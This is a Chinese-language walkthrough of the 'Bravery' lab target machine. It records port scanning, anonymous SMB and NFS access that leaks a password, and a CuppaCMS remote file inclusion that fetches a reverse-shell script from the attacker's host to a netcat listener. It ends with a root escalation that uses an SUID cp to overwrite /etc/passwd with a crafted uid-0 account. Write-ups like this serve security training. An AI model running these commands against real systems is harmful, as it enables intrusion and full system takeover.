Bravery靶机通关笔记
一、主机发现
arp-scan -l
靶机ip为192.168.55.152
二、端口扫描、目录枚举、漏洞扫描、指纹识别
2.1端口扫描
nmap --min-rate 10000 -p- 192.168.55.152
发现靶机开放了很多端口
UDP端口扫描
nmap -sU --min-rate 10000 -p- 192.168.55.152
靶机也开放了很多UDP端口
2.2目录枚举
dirb http://192.168.55.152
扫出来了很多目录
2.3指纹识别
nmap 192.168.55.152 -sV -sC -O --version-all
三、进入靶机网站寻找信息,反弹shell
3.1 80端口信息收集
访问靶机网页寻找信息
发现网站还没有搭建好,访问dirb枚举出来的敏感路径
直接访问该url是404,那就需要我们拼接一下试试看了
查看源码也没有其它信息,继续看uploads目录
找到了一个note文件
得到了CMS信息
80端口的信息很少,去8080端口再看看
3.2 8080端口信息收集
看来主要的信息在这个端口,继续扫目录
dirb http://192.168.55.152:8080
访问该目录,发现信息
都访问试试
qwertyuiop.html目录下是一张图片
把图片下载下来,看看有无隐写的内容
发现没有
public目录下是一个静态网页
8080端口的信息到此已经收集完毕,去看看其它端口开放的服务
3.3 445端口SMB服务信息收集
使用工具进行enum4linux查看smb服务信息
enum4linux 192.168.55.152
发现SMB服务可以匿名登陆
还有几个用户名
smbclient //192.168.55.152/anonymous -N
以匿名模式登陆smb服务,将文件下载到kali本地
翻译了一下发现没啥信息
3.4 nfs目录挂载
继续尝试2049端口开启的nfs服务
showmount -e 192.168.55.152
mkdir 1
mount -t nfs 192.168.55.152:/var/nfsshare ./1
成功挂载
发现有一个password.txt文件
根据提示,这个特殊文件名应该就是密码
猜测该密码是david的
3.5 登陆david的SMB服务
试试david的SMB服务
smbclient //192.168.55.152/secured -U david
qwertyuioplkjhgfdsazxcvbnm
成功登陆david账户
将三个文件都下载下来看看
根据文件内容找到了新页面
随后找到了登录框
点击此即可
查查该框有啥漏洞可以利用
searchsploit cuppa
成功找到一个文件包含漏洞
查看该exp后找到漏洞利用方法
发现可以远程执行文件包含
那直接使用kali本机的反弹shell文件
python -m http.server 80
nc -lvvp 4444
http://192.168.55.152/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=http://192.168.55.147/1.php
成功拿到shell
四、提权
4.1靶机信息收集
查看有无定时任务
crontab -l
继续寻找SUID文件
find / -perm -4000 -print 2>/dev/null
发现cp命令具有SUID权限,那直接新建一个具有root权限的用户,然后添加到/etc/passwd即可
openssl passwd -1 -salt 123456 123456 生成密码
cat /etc/passwd 将所有的用户密码文件放到新文件夹中
cd /tmp tmp文件夹权限较高echo 'root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
david:x:1000:1000:david:/home/david:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
geoclue:x:997:995:User for geoclue:/var/lib/geoclue:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
nginx:x:996:994:Nginx web server:/var/lib/nginx:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
libstoragemgmt:x:995:991:daemon account for libstoragemgmt:/var/run/lsm:/sbin/nologin
gluster:x:994:990:GlusterFS daemons:/var/run/gluster:/sbin/nologin
unbound:x:993:989:Unbound DNS resolver:/etc/unbound:/sbin/nologin
qemu:x:107:107:qemu user:/:/sbin/nologin
usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
rtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin
colord:x:992:988:User for colord:/var/lib/colord:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
saslauth:x:991:76:Saslauthd user:/run/saslauthd:/sbin/nologin
pulse:x:171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
sssd:x:990:984:User for sssd:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
radvd:x:75:75:radvd user:/:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
setroubleshoot:x:989:983::/var/lib/setroubleshoot:/sbin/nologin
gnome-initial-setup:x:988:982::/run/gnome-initial-setup/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
ossec:x:1001:1002::/var/ossec:/sbin/nologin
ossecm:x:1002:1002::/var/ossec:/sbin/nologin
ossecr:x:1003:1002::/var/ossec:/sbin/nologin
rick:x:1004:1004::/home/rick:/bin/bash' >> pp 将文件写入到新的pp文件中echo 'pp:$1$123456$wOSEtcyiP2N/IfIl15W6Z0:0:0::/root:/bin/bash' >> pp 在pp文件下追加新建的pp用户
cp pp /etc/passwd 将pp文件覆盖原本的/etc/passwd文件
su pp
123456
成功提权!